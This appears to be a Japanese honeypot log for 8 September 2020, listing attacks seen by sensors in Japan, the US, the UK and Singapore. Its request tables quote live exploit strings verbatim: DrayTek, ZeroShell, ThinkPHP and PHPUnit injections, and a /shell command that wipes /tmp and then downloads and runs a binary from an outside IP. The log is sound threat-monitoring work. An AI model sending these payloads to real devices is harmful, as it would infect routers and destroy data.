ハニーポット(仮) 観測記録 2020/09/08分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
libwww-perlによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.132.53.147/hakaibin/h4k4i.arm7; chmod 777 /tmp/h4k4i.arm7; sh /tmp/h4k4i.arm7 hakai.Rep.Jaws
Location:US
GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
zgrabによるスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.132.53.147/hakaibin/h4k4i.arm7; chmod 777 /tmp/h4k4i.arm7; sh /tmp/h4k4i.arm7 hakai.Rep.Jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
libwww-perlによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.132.53.147/hakaibin/h4k4i.arm7; chmod 777 /tmp/h4k4i.arm7; sh /tmp/h4k4i.arm7 hakai.Rep.Jaws
他
アクセス数推移
JP:総アクセス数:29 (前日比:-11)
US:総アクセス数:18 (前日比:-210)
UK:総アクセス数:54 (前日比:+31)
SG:総アクセス数:128 (前日比:0)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 2.239.23.47 | Italy |
| 1 | 40.88.146.2 | United States |
| 7 | 45.84.196.66 | Germany |
| 3 | 45.148.10.28 | Italy |
| 1 | 45.148.121.31 | Netherlands |
| 1 | 47.242.59.154 | United States |
| 2 | 87.251.75.254 | Russia |
| 1 | 94.102.56.181 | Netherlands |
| 1 | 102.47.125.90 | Egypt |
| 2 | 119.28.232.240 | China |
| 1 | 134.19.215.196 | Azerbaijan |
| 1 | 148.251.10.115 | Germany |
| 1 | 192.241.225.27 | United States |
| 1 | 192.241.230.238 | United States |
| 5 | 195.54.160.21 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 14 | - |
| 1 | Hello, world |
| 1 | Mozilla/5.0 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | libwww-perl/6.46 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 | ||
| 2 | \x16\x03\x01 | ||
| 1 | CONNECT | www[.]google[.]com/:443 | HTTP/1.1 |
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | //PMA/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //admin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //dbadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //mysql/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /HNAP1/ | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /level/15/exec/-/sh/run/CR | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | http[:]//passport[.]baidu[.]com/ | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http[:]//19ce033f[.]ngrok[.]io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 45.148.10.28 | Italy |
| 1 | 111.43.223.100 | China |
| 2 | 129.204.8.130 | China |
| 10 | 188.166.246.178 | Netherlands |
| 1 | 190.128.154.222 | Paraguay |
| 1 | 192.241.232.48 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | - |
| 1 | Hello, World |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /api.php | HTTP/1.1 |
| 1 | GET | /client_area/ | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /login.php | HTTP/1.1 |
| 1 | GET | /stalker_portal/c/ | HTTP/1.1 |
| 1 | GET | /stalker_portal/c/version.js | HTTP/1.1 |
| 1 | GET | /streaming | HTTP/1.1 |
| 1 | GET | /streaming/4e7Ko8znKX.php | HTTP/1.1 |
| 2 | GET | /streaming/clients_live.php | HTTP/1.1 |
| 1 | GET | /system_api.php | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 3 | POST | /boaform/admin/formLogin | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 39.105.118.109 | China |
| 2 | 45.148.10.28 | Italy |
| 10 | 62.234.121.87 | China |
| 1 | 102.43.25.63 | Egypt |
| 14 | 119.47.89.187 | Indonesia |
| 10 | 152.136.115.82 | China |
| 1 | 156.200.165.130 | Egypt |
| 1 | 157.230.60.101 | United States |
| 10 | 165.22.202.90 | United States |
| 1 | 192.241.227.40 | United States |
| 1 | 192.241.227.211 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 15 | - |
| 2 | Go-http-client/1.1 |
| 2 | Hello, world |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
| 21 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x16\x03\x01 | ||
| 2 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 3 | GET | /TP/index.php | HTTP/1.1 |
| 3 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /api.php | HTTP/1.1 |
| 14 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
| 1 | GET | /client_area/ | HTTP/1.1 |
| 2 | GET | /elrekt.php | HTTP/1.1 |
| 2 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /login.php | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 2 | GET | /public/index.php | HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws | HTTP/1.1 |
| 1 | GET | /stalker_portal/c/ | HTTP/1.1 |
| 1 | GET | /stalker_portal/c/version.js | HTTP/1.1 |
| 1 | GET | /streaming | HTTP/1.1 |
| 1 | GET | /streaming/ZCSW0a6d.php | HTTP/1.1 |
| 2 | GET | /streaming/clients_live.php | HTTP/1.1 |
| 1 | GET | /system_api.php | HTTP/1.1 |
| 3 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 2 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 101 | 1.196.8.104 | China |
| 6 | 35.222.247.46 | United States |
| 2 | 45.148.10.28 | Italy |
| 1 | 66.240.205.34 | United States |
| 3 | 89.248.172.90 | Netherlands |
| 1 | 94.102.56.181 | Netherlands |
| 1 | 102.43.135.86 | Egypt |
| 1 | 102.47.106.45 | Egypt |
| 1 | 112.122.61.117 | China |
| 1 | 149.129.57.130 | Singapore |
| 1 | 192.241.202.146 | United States |
| 1 | 192.241.234.169 | United States |
| 8 | 195.54.160.21 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 10 | - |
| 1 | Hello, World |
| 2 | Hello, world |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729) |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | libwww-perl/6.46 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 1 | Gh0st\xad | ||
| 1 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /level/15/exec/-/sh/run/CR | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | http[:]//httpheader[.]net/azenv.php | HTTP/1.1 |
| 1 | GET | http[:]//passport[.]baidu[.]com/ | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
